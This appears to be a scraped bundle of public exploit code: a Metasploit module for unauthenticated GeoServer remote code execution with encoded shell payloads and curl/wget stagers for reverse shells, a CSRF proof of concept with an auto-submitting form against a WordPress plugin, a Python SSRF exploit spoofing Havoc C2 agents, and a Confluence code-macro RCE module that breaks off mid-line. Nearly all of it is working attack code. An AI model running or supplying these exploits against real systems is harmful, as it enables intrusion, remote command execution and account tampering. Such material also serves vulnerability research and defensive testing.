<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Geoserver unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> GeoServer is an open-source software server written in Java that provides<br /> the ability to view, edit, and share geospatial data.<br /> It is designed to be a flexible, efficient solution for distributing geospatial data<br /> from a variety of sources such as Geographic Information System (GIS) databases,<br /> web-based data, and personal datasets.<br /> In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,<br /> multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users<br /> through specially crafted input against a default GeoServer installation due to unsafely<br /> evaluating property names as XPath expressions.<br /> An attacker can abuse this by sending a POST request with a malicious xpath expression<br /> to execute arbitrary commands as root on the system.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'jheysel-r7', # MSF module Windows support<br /> 'Steve Ikeoka' # Discovery<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-36401'],<br /> ['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],<br /> ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],<br /> ['URL', 'https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401']<br /> ],<br /> 'DisclosureDate' => '2024-07-01',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> # Tested with cmd/unix/reverse_bash<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'Linemax' => 16384,<br /> 'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne']<br /> # Tested with linux/x64/meterpreter_reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => ['Windows'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd<br /> # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8080,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check_version<br /> print_status('Trying to detect if target is running a vulnerable version of GeoServer.')<br /> res = send_request_cgi!({<br /> 'uri' => normalize_uri(target_uri.path, 'geoserver', 'web', 'wicket', 'bookmarkable', 'org.geoserver.web.AboutGeoServerPage'),<br /> 'keep_cookies' => true,<br /> 'method' => 'GET'<br /> })<br /> return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')<br /><br /> html = res.get_html_document<br /> unless html.blank?<br /> # html identifier for Geoserver version information: <span id="version">2.23.2</span><br /> version = html.css('span[id="version"]')<br /> return Rex::Version.new(version[0].text) unless version[0].nil?<br /> end<br /> nil<br /> end<br /><br /> def get_valid_featuretype<br /> allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']<br /> res = send_request_cgi!({<br /> 'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),<br /> 'method' => 'GET',<br /> 'ctype' => 'application/xml',<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'request' => 'ListStoredQueries',<br /> 'service' => 'wfs'<br /> }<br /> })<br /> return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')<br /><br /> xml = res.get_xml_document<br /> unless xml.blank?<br /> xml.remove_namespaces!<br /> # get all the FeatureTypes and store them in an array of strings<br /> retrieved_feature_types = xml.xpath('//ReturnFeatureType')<br /> # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer<br /> # return the feature type if a match is found in the allowed_feature_types array<br /> retrieved_feature_types.to_a.shuffle.each do |feature_type|<br /> return feature_type.text if allowed_feature_types.include?(feature_type.text)<br /> end<br /> end<br /> nil<br /> end<br /><br /> def create_payload(cmd)<br /> # get a valid feature type and fail back to a default if not successful<br /> feature_type = get_valid_featuretype<br /> feature_type = 'sf:archsites' if feature_type.nil?<br /><br /> case target['Type']<br /> when :unix_cmd || :linux_dropper<br /> # create customised b64 encoded payload<br /> # 'Encoder' => 'cmd/base64' does not work in this particular use case<br /> cmd_b64 = Base64.strict_encode64(cmd)<br /> cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"<br /> when :win_cmd<br /> enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))<br /> cmd = "powershell.exe -e #{enc_cmd}"<br /> end<br /><br /> return <<~EOS<br /> <wfs:GetPropertyValue service='WFS' version='2.0.0'<br /> xmlns:topp='http://www.openplans.org/topp'<br /> xmlns:fes='http://www.opengis.net/fes/2.0'<br /> xmlns:wfs='http://www.opengis.net/wfs/2.0'><br /> <wfs:Query typeNames="#{feature_type}"/><br /> <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference><br /> </wfs:GetPropertyValue><br /> EOS<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/xml',<br /> 'keep_cookies' => true,<br /> 'data' => create_payload(cmd)<br /> })<br /> fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')<br /> end<br /><br /> def check<br /> version_number = check_version<br /> return CheckCode::Unknown('Could not retrieve the version information.') if version_number.nil?<br /> return CheckCode::Appears("Version #{version_number}") if version_number.between?(Rex::Version.new('2.25.0'), Rex::Version.new('2.25.1')) || version_number.between?(Rex::Version.new('2.24.0'), Rex::Version.new('2.24.3')) || version_number < Rex::Version.new('2.23.6')<br /><br /> CheckCode::Safe("Version #{version_number}")<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /><br /> case target['Type']<br /> when :unix_cmd, :win_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> # don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile<br />picture<br /># Date: 2024-07-01<br /># Exploit Author: Vuln Seeker Cybersecurity Team<br /># Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/<br /># Version: <= 1.0.5<br /># Tested on: Firefox<br /># Contact me: vulns@vulnseeker.org<br /><br />The plugin does not have CSRF checks in some places, which could allow<br />attackers to make logged in users perform unwanted actions via CSRF attacks.<br /><br />Proof of concept:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost:10003<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)<br />Gecko/20100101 Firefox/124.0<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 1093<br />Origin: http://localhost:10003<br />Sec-GPC: 1<br />Connection: close<br />Cookie: Cookie<br /><br />action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1<br /><br /><br />CSRF Exploit:<br /><br /><html><br /> <body><br /> <form action="http://localhost:10003/wp-admin/admin-ajax.php"<br />method="POST"><br /> <input type="hidden" name="action" value="pzfm_upload_avatar" /><br /> <input type="hidden" name="imageData"<br />value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="<br />/><br /> <input type="hidden" name="userID" value="1"" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> <script><br /> history.pushState('', '', '/');<br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br />Profile picture of user 1 will be changed in the dashboard<br />http://localhost:10003/dashboard/?dashboard=profile<br /><br />Reference:<br />https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/<br /></code></pre>
<pre><code># Exploit Title: Havoc C2 0.7 Unauthenticated SSRF<br /># Date: 2024-07-13<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/HavocFramework/Havoc<br /># Version: v0.7<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE: ?<br /># Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.<br /># Github: https://github.com/chebuya/Havoc-C2-SSRF-poc<br /># Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/<br />import binascii<br />import random<br />import requests<br />import argparse<br />import urllib3<br />urllib3.disable_warnings()<br /><br /><br />from Crypto.Cipher import AES<br />from Crypto.Util import Counter<br /><br />key_bytes = 32<br /><br />def decrypt(key, iv, ciphertext):<br /> if len(key) <= key_bytes:<br /> for _ in range(len(key), key_bytes):<br /> key += b"0"<br /><br /> assert len(key) == key_bytes<br /><br /> iv_int = int(binascii.hexlify(iv), 16)<br /> ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)<br /> aes = AES.new(key, AES.MODE_CTR, counter=ctr)<br /><br /> plaintext = aes.decrypt(ciphertext)<br /> return plaintext<br /><br /><br />def int_to_bytes(value, length=4, byteorder="big"):<br /> return value.to_bytes(length, byteorder)<br /><br /><br />def encrypt(key, iv, plaintext):<br /><br /> if len(key) <= key_bytes:<br /> for x in range(len(key),key_bytes):<br /> key = key + b"0"<br /><br /> assert len(key) == key_bytes<br /><br /> iv_int = int(binascii.hexlify(iv), 16)<br /> ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)<br /> aes = AES.new(key, AES.MODE_CTR, counter=ctr)<br /><br /> ciphertext = aes.encrypt(plaintext)<br /> return ciphertext<br /><br />def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):<br /> # DEMON_INITIALIZE / 99<br /> command = b"\x00\x00\x00\x63"<br /> request_id = b"\x00\x00\x00\x01"<br /> demon_id = agent_id<br /><br /> hostname_length = int_to_bytes(len(hostname))<br /> username_length = int_to_bytes(len(username))<br /> domain_name_length = int_to_bytes(len(domain_name))<br /> internal_ip_length = int_to_bytes(len(internal_ip))<br /> process_name_length = int_to_bytes(len(process_name) - 6)<br /><br /> data = b"\xab" * 100<br /><br /> header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data<br /><br /> size = 12 + len(header_data)<br /> size_bytes = size.to_bytes(4, 'big')<br /> agent_header = size_bytes + magic + agent_id<br /><br /> print("[***] Trying to register agent...")<br /> r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)<br /> if r.status_code == 200:<br /> print("[***] Success!")<br /> else:<br /> print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")<br /><br /><br />def open_socket(socket_id, target_address, target_port):<br /> # COMMAND_SOCKET / 2540<br /> command = b"\x00\x00\x09\xec"<br /> request_id = b"\x00\x00\x00\x02"<br /><br /> # SOCKET_COMMAND_OPEN / 16<br /> subcommand = b"\x00\x00\x00\x10"<br /> sub_request_id = b"\x00\x00\x00\x03"<br /><br /> local_addr = b"\x22\x22\x22\x22"<br /> local_port = b"\x33\x33\x33\x33"<br /><br /><br /> forward_addr = b""<br /> for octet in target_address.split(".")[::-1]:<br /> forward_addr += int_to_bytes(int(octet), length=1)<br /><br /> forward_port = int_to_bytes(target_port)<br /><br /> package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port<br /> package_size = int_to_bytes(len(package) + 4)<br /><br /> header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)<br /><br /> size = 12 + len(header_data)<br /> size_bytes = size.to_bytes(4, 'big')<br /> agent_header = size_bytes + magic + agent_id<br /> data = agent_header + header_data<br /><br /><br /> print("[***] Trying to open socket on the teamserver...")<br /> r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)<br /> if r.status_code == 200:<br /> print("[***] Success!")<br /> else:<br /> print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")<br /><br /><br />def write_socket(socket_id, data):<br /> # COMMAND_SOCKET / 2540<br /> command = b"\x00\x00\x09\xec"<br /> request_id = b"\x00\x00\x00\x08"<br /><br /> # SOCKET_COMMAND_READ / 11<br /> subcommand = b"\x00\x00\x00\x11"<br /> sub_request_id = b"\x00\x00\x00\xa1"<br /><br /> # SOCKET_TYPE_CLIENT / 3<br /> socket_type = b"\x00\x00\x00\x03"<br /> success = b"\x00\x00\x00\x01"<br /><br /> data_length = int_to_bytes(len(data))<br /><br /> package = subcommand+socket_id+socket_type+success+data_length+data<br /> package_size = int_to_bytes(len(package) + 4)<br /><br /> header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)<br /><br /> size = 12 + len(header_data)<br /> size_bytes = size.to_bytes(4, 'big')<br /> agent_header = size_bytes + magic + agent_id<br /> post_data = agent_header + header_data<br /><br /> print("[***] Trying to write to the socket")<br /> r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)<br /> if r.status_code == 200:<br /> print("[***] Success!")<br /> else:<br /> print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}")<br /><br /><br />def read_socket(socket_id):<br /> # COMMAND_GET_JOB / 1<br /> command = b"\x00\x00\x00\x01"<br /> request_id = b"\x00\x00\x00\x09"<br /><br /> header_data = command + request_id<br /><br /> size = 12 + len(header_data)<br /> size_bytes = size.to_bytes(4, 'big')<br /> agent_header = size_bytes + magic + agent_id<br /> data = agent_header + header_data<br /><br /><br /> print("[***] Trying to poll teamserver for socket output...")<br /> r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)<br /> if r.status_code == 200:<br /> print("[***] Read socket output successfully!")<br /> else:<br /> print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")<br /> return ""<br /><br /><br /> command_id = int.from_bytes(r.content[0:4], "little")<br /> request_id = int.from_bytes(r.content[4:8], "little")<br /> package_size = int.from_bytes(r.content[8:12], "little")<br /> enc_package = r.content[12:]<br /><br /> return decrypt(AES_Key, AES_IV, enc_package)[12:]<br /><br /><br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)<br />parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)<br />parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)<br />parser.add_argument("-A", "--user-agent", help="The URL for a havoc listener", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")<br />parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")<br />parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")<br />parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")<br />parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")<br />parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")<br /><br />args = parser.parse_args()<br /><br /><br /># 0xDEADBEEF<br />magic = b"\xde\xad\xbe\xef"<br />teamserver_listener_url = args.target<br />headers = {<br /> "User-Agent": args.user_agent<br />}<br />agent_id = int_to_bytes(random.randint(100000, 1000000))<br />AES_Key = b"\x00" * 32<br />AES_IV = b"\x00" * 16<br />hostname = bytes(args.hostname, encoding="utf-8")<br />username = bytes(args.username, encoding="utf-8")<br />domain_name = bytes(args.domain_name, encoding="utf-8")<br />internal_ip = bytes(args.internal_ip, encoding="utf-8")<br />process_name = args.process_name.encode("utf-16le")<br />process_id = int_to_bytes(random.randint(1000, 5000))<br /><br />register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)<br /><br />socket_id = b"\x11\x11\x11\x11"<br />open_socket(socket_id, args.ip, int(args.port))<br /><br />request_data = b"GET /vulnerable HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"<br />write_socket(socket_id, request_data)<br />print(read_socket(socket_id).decode())<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,<br /> tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating<br /> tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will<br /> authenticate, validate user privileges, extract the underlying host OS information, then trigger<br /> remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions<br /> up to 8.9.0.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ankita Sawlani', # Discovery<br /> 'Huong Kieu', # Public Analysis<br /> 'W01fh4cker', # PoC Exploit<br /> 'remmons-r7' # MSF Exploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-21683'],<br /> ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],<br /> ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],<br /> ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']<br /> ],<br /> 'DisclosureDate' => '2024-05-21',<br /> 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.<br /> 'Platform' => ['unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultTarget' => 0,<br /> 'Targets' => [ [ 'Default', {} ] ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> # The access log files will contain requests to the exploitable administrator dashboard endpoints.<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> # By default, Confluence serves an HTTP service on TCP port 8090.<br /> Opt::RPORT(8090),<br /> OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']),<br /> OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']),<br /> OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', ''])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Begin by retrieving the version string from the login page.<br /> version = get_confluence_version<br /> return CheckCode::Unknown('Failed to determine the Confluence version') unless version<br /><br /> # Check the extracted version against all documented vulnerable versions.<br /> if version == Rex::Version.new('8.9.0') ||<br /> version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) ||<br /> version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) ||<br /> version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) ||<br /> version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) ||<br /> version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) ||<br /> version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) ||<br /> version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) ||<br /> version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) ||<br /> version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) ||<br /> version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) ||<br /> version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) ||<br /> version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) ||<br /> version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) ||<br /> # According to Atlassian, all versions < 7.17 are vulnerable.<br /> version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))<br /> Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")<br /> else<br /> Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}")<br /> end<br /> end<br /><br /> def login(username, password)<br /> # Perform a POST request to login to Confluence with the provided credentials.<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'dologin.action'),<br /> 'keep_cookies' => 'true',<br /> 'vars_post' => {<br /> 'os_username' => username,<br /> 'os_password' => password,<br /> 'os_destination' => '%2FXsuccessX'<br /> }<br /> )<br /> end<br /><br /> def elevate<br /> # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place.<br /> vprint_status('Secure Administrator Sessions enabled - elevating session')<br /><br /> # Grab a CSRF token from the elevation page form.<br /> csrf_elevation = get_csrf('doauthenticate.action', 'elevation')<br /><br /> # With the valid elevation token, escalate the current administrator session.<br /> res_elevate = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'),<br /> 'keep_cookies' => 'true',<br /> 'vars_post' => {<br /> 'atl_token' => csrf_elevation,<br /> 'password' => datastore['ADMIN_PASS'],<br /> 'authenticate' => 'Confirm',<br /> 'destination' => '%2FXsuccessX'<br /> }<br /> )<br /><br /> # Connection failure, no response, or malformed response.<br /> fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate<br /><br /> # Confirm that the response indicates a successful elevation.<br /> fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX')<br /><br /> vprint_status('Administrator session has been elevated')<br /> end<br /><br /> def get_csrf(page, operation)<br /> # Perform a GET request to the target page to grab a CSRF token.<br /> res_get_csrf = send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => 'true',<br /> 'uri' => normalize_uri(target_uri.path, page)<br /> )<br /><br /> # Connection failure, no response, or malformed response.<br /> fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf<br /><br /> # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly.<br /> fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token')<br /><br /> # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'.<br /> csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2)<br /><br /> # Token should be 40 characters.<br /> fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40<br /><br /> vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")<br /><br /> csrf_token<br /> end<br /><br /> def get_host_os<br /> # Elevated Confluence administrators can view system information, which will be used to confirm the target OS.<br /> res_sysinfo = send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => 'true',<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action')<br /> )<br /><br /> # Connection failure, no response, or malformed response.<br /> fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo<br /><br /> # Confirm that the response is the expected system info page.<br /> fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system')<br /><br /> # Extract the OS string from the response DOM.<br /> os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text<br /> vprint_status("Target returned the operating system string '#{os}'")<br /><br /> # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.<br /> os.downcase.start_with?('win') ? 'win' : 'nix'<br /> end<br /><br /> def upload_payload(shell)<br /> # Grab a valid macro dashboard CSRF token.<br /> csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro')<br /><br /> # Initialize a multipart form.<br /> payload_form = Rex::MIME::Message.new<br /><br /> # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.<br /> payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"<br /><br /> # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.<br /> payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')<br /> payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")<br /> payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"')<br /><br /> vprint_status("Crafted ProcessBuilder payload string: 